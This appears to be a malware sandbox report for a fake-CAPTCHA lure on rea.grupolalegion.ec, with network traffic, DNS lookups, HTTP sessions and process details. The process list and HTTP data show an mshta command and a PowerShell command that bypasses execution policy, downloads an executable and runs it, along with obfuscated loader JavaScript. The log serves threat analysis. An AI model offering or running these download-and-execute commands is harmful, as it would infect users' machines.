                                                                                                                              Mar 7, 2025 13:22:00.329811096 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.335550070 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.335567951 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.335659027 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.335675001 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.335731983 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.358690977 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.358710051 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.358802080 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.358829021 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.358890057 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.361748934 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.361764908 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.361838102 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.361854076 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.361906052 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.386142969 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.386168003 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.386264086 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.386291027 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.386347055 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.411956072 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.412015915 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.412081003 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.412102938 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.412136078 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.412153006 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.413084984 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.413126945 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.413161993 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.413181067 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.413208961 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.413225889 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.415649891 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.415668011 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.415759087 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.415776014 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.415829897 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.419522047 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.419539928 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.419620037 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.419639111 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.419691086 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.425642967 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.425662994 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.425748110 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.425767899 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.425816059 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.448952913 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.448973894 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.449043989 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.449089050 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.449155092 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.451910019 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.451925039 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.451997995 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.452013969 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.452064991 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.476187944 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.476208925 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.476337910 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.476363897 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.476419926 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.502083063 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502104044 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502212048 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.502233028 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502293110 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.502563953 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502619982 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502671957 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502682924 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.502707005 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.502728939 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:01.420435905 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:01.717739105 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:32.614429951 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:32.614475012 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:32.614541054 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:32.614814043 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:32.614835024 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:34.631318092 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:34.661416054 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:34.661432028 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:34.662014008 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:34.667426109 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:34.667524099 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:34.768548965 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:44.305128098 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:44.305201054 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:44.305249929 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:45.252909899 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:45.252938986 CET44349727216.58.206.68192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 7, 2025 13:21:32.552114964 CET | 192.168.2.8 | 1.1.1.1 | 0xbcd | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:21:32.552239895 CET | 192.168.2.8 | 1.1.1.1 | 0x84ef | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Mar 7, 2025 13:21:35.013667107 CET | 192.168.2.8 | 1.1.1.1 | 0xf4c1 | Standard query (0) | rea.grupolalegion.ec | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:21:35.013927937 CET | 192.168.2.8 | 1.1.1.1 | 0xecb9 | Standard query (0) | rea.grupolalegion.ec | 65 | IN (0x0001) | false
Mar 7, 2025 13:21:38.546032906 CET | 192.168.2.8 | 1.1.1.1 | 0xe02d | Standard query (0) | rea.grupolalegion.ec | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:21:38.546248913 CET | 192.168.2.8 | 1.1.1.1 | 0x90 | Standard query (0) | rea.grupolalegion.ec | 65 | IN (0x0001) | false
Mar 7, 2025 13:21:51.399053097 CET | 192.168.2.8 | 1.1.1.1 | 0xeb23 | Standard query (0) | rea.grupolalegion.ec | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:22:03.970877886 CET | 192.168.2.8 | 1.1.1.1 | 0x5887 | Standard query (0) | rea.grupolalegion.ec | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:22:22.935525894 CET | 192.168.2.8 | 1.1.1.1 | 0x9931 | Standard query (0) | rea.grupolalegion.ec | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:22:32.605942965 CET | 192.168.2.8 | 1.1.1.1 | 0x551e | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:22:32.606084108 CET | 192.168.2.8 | 1.1.1.1 | 0xecb9 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 7, 2025 13:21:32.559472084 CET | 1.1.1.1 | 192.168.2.8 | 0x84ef | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Mar 7, 2025 13:21:32.560271025 CET | 1.1.1.1 | 192.168.2.8 | 0xbcd | No error (0) | www.google.com | | 142.250.185.164 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:21:35.539036989 CET | 1.1.1.1 | 192.168.2.8 | 0xf4c1 | No error (0) | rea.grupolalegion.ec | | 190.92.154.206 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:21:38.754889965 CET | 1.1.1.1 | 192.168.2.8 | 0xe02d | No error (0) | rea.grupolalegion.ec | | 190.92.154.206 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:21:51.608771086 CET | 1.1.1.1 | 192.168.2.8 | 0xeb23 | No error (0) | rea.grupolalegion.ec | | 190.92.154.206 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:22:03.979011059 CET | 1.1.1.1 | 192.168.2.8 | 0x5887 | No error (0) | rea.grupolalegion.ec | | 190.92.154.206 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:22:23.043346882 CET | 1.1.1.1 | 192.168.2.8 | 0x9931 | No error (0) | rea.grupolalegion.ec | | 190.92.154.206 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:22:32.613358974 CET | 1.1.1.1 | 192.168.2.8 | 0x551e | No error (0) | www.google.com | | 216.58.206.68 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 13:22:32.613430977 CET | 1.1.1.1 | 192.168.2.8 | 0xecb9 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49714 | 190.92.154.206 | 443 | 6828 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-07 12:21:37 UTC | 670 | OUT | GET /p.php/1 HTTP/1.1
Host: rea.grupolalegion.ec
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-03-07 12:21:37 UTC | 487 | IN | HTTP/1.1 200 OK
Connection: close
x-powered-by: PHP/7.4.33
content-type: text/html; charset=UTF-8
content-length: 29998
date: Fri, 07 Mar 2025 12:21:37 GMT
server: LiteSpeed
strict-transport-security: max-age=63072000; includeSubDomains
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-03-07 12:21:37 UTC | 881 | IN | Data Ascii: <!DOCTYPE html><html lang="en-US" dir="ltr"><head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <title>Just a moment...</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex,
2025-03-07 12:21:37 UTC | 14994 | IN
2025-03-07 12:21:37 UTC | 14123 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49713 | 190.92.154.206 | 443 | 6828 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-07 12:21:38 UTC | 542 | OUT | GET /p.php/1?js HTTP/1.1
Host: rea.grupolalegion.ec
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://rea.grupolalegion.ec/p.php/1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-03-07 12:21:38 UTC | 563 | IN | HTTP/1.1 200 OK
Connection: close
x-powered-by: PHP/7.4.33
content-type: application/javascript
cache-control: public, max-age=604800
expires: Fri, 14 Mar 2025 12:21:38 GMT
content-length: 7901
date: Fri, 07 Mar 2025 12:21:38 GMT
server: LiteSpeed
strict-transport-security: max-age=63072000; includeSubDomains
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-03-07 12:21:38 UTC | 805 | IN | Data Ascii: !function($,x){function n($,x,n,r){return _0x2437(n-499,$)}function r($,x,n,r){return _0x2437($-605,r)}for(var t=$();;)try{if(parseInt(r(1086,1069,1080,1097))/1+parseInt(n(951,929,958,954))/2+-parseInt(r(1130,1114,1113,1096))/3*(-parseInt(r(1084,1065,1098
2025-03-07 12:21:38 UTC | 7096 | IN | Data Ascii: x,r,t){return n($,x-203,x- -726,t-230)}if(x[e(97,127,139,99)](c(1355,1367,1327,1354),x[c(1405,1416,1384,1386)])){var u=r?function(){if(t){var x=t[e(1513,130,1272,1378)]($,arguments);return t=null,x}}:function(){};return r=!1,u}if(_0x46b0f7){var i=_0x3c61f


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49716 | 190.92.154.206 | 443 | 6828 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-07 12:21:40 UTC | 603 | OUT | GET /favicon.ico HTTP/1.1
Host: rea.grupolalegion.ec
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://rea.grupolalegion.ec/p.php/1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-03-07 12:21:40 UTC | 541 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Fri, 07 Mar 2025 12:21:40 GMT
server: LiteSpeed
strict-transport-security: max-age=63072000; includeSubDomains
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-03-07 12:21:40 UTC | 796 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49717 | 190.92.154.206 | 443 | 6828 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-07 12:21:40 UTC | 354 | OUT | GET /p.php/1?js HTTP/1.1
Host: rea.grupolalegion.ec
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-03-07 12:21:41 UTC | 563 | IN | HTTP/1.1 200 OK
Connection: close
x-powered-by: PHP/7.4.33
content-type: application/javascript
cache-control: public, max-age=604800
expires: Fri, 14 Mar 2025 12:21:40 GMT
content-length: 7901
date: Fri, 07 Mar 2025 12:21:40 GMT
server: LiteSpeed
strict-transport-security: max-age=63072000; includeSubDomains
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                              2025-03-07 12:21:41 UTC | 805 | IN | Data Ascii: !function($,x){function n($,x,n,r){return _0x2437(n-499,$)}function r($,x,n,r){return _0x2437($-605,r)}for(var t=$();;)try{if(parseInt(r(1086,1069,1080,1097))/1+parseInt(n(951,929,958,954))/2+-parseInt(r(1130,1114,1113,1096))/3*(-parseInt(r(1084,1065,1098
                                                                                                                              2025-03-07 12:21:41 UTC | 7096 | IN | Data Ascii: x,r,t){return n($,x-203,x- -726,t-230)}if(x[e(97,127,139,99)](c(1355,1367,1327,1354),x[c(1405,1416,1384,1386)])){var u=r?function(){if(t){var x=t[e(1513,130,1272,1378)]($,arguments);return t=null,x}}:function(){};return r=!1,u}if(_0x46b0f7){var i=_0x3c61f


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              4 | 192.168.2.8 | 49722 | 190.92.154.206 | 443 | 760 | C:\Windows\SysWOW64\mshta.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              2025-03-07 12:21:53 UTC | 309 | OUT | GET /p.php HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-CH
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: rea.grupolalegion.ec
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-03-07 12:21:53 UTC | 485 | IN | HTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              content-length: 693
                                                                                                                              date: Fri, 07 Mar 2025 12:21:53 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                              2025-03-07 12:21:53 UTC | 693 | IN | Data Ascii: <!DOCTYPE html><html><head><HTA:APPLICATION ID="CS" APPLICATIONNAME="Captcha" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"><script>new ActiveXObject("Wscript.Shell").Run("powershell -ep Bypass -nop -c \"In


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              5 | 192.168.2.8 | 49723 | 190.92.154.206 | 443 | 5292 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              2025-03-07 12:21:57 UTC | 174 | OUT | GET /Viber.exe HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                              Host: rea.grupolalegion.ec
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-03-07 12:21:58 UTC | 564 | IN | HTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              content-type: application/x-msdownload
                                                                                                                              last-modified: Tue, 04 Mar 2025 06:02:20 GMT
                                                                                                                              accept-ranges: bytes
                                                                                                                              content-length: 2142592
                                                                                                                              date: Fri, 07 Mar 2025 12:21:57 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              content-disposition: attachment
                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                                                              Target ID:0
                                                                                                                              Start time:07:21:21
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                              Imagebase:0x7ff678760000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Target ID:2
                                                                                                                              Start time:07:21:26
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1924,i,3712918176845887802,6985471661213031996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                              Imagebase:0x7ff678760000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Target ID:3
                                                                                                                              Start time:07:21:34
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rea.grupolalegion.ec/p.php/1"
                                                                                                                              Imagebase:0x7ff678760000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:07:21:49
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:cmd /K mshta https://rea.grupolalegion.ec/p.php
                                                                                                                              Imagebase:0xa40000
                                                                                                                              File size:236'544 bytes
                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Target ID:7
                                                                                                                              Start time:07:21:49
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Target ID:8
                                                                                                                              Start time:07:21:49
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:mshta https://rea.grupolalegion.ec/p.php
                                                                                                                              Imagebase:0x4b0000
                                                                                                                              File size:13'312 bytes
                                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:10
                                                                                                                              Start time:07:21:53
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
                                                                                                                              Imagebase:0xa0000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:11
                                                                                                                              Start time:07:21:53
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
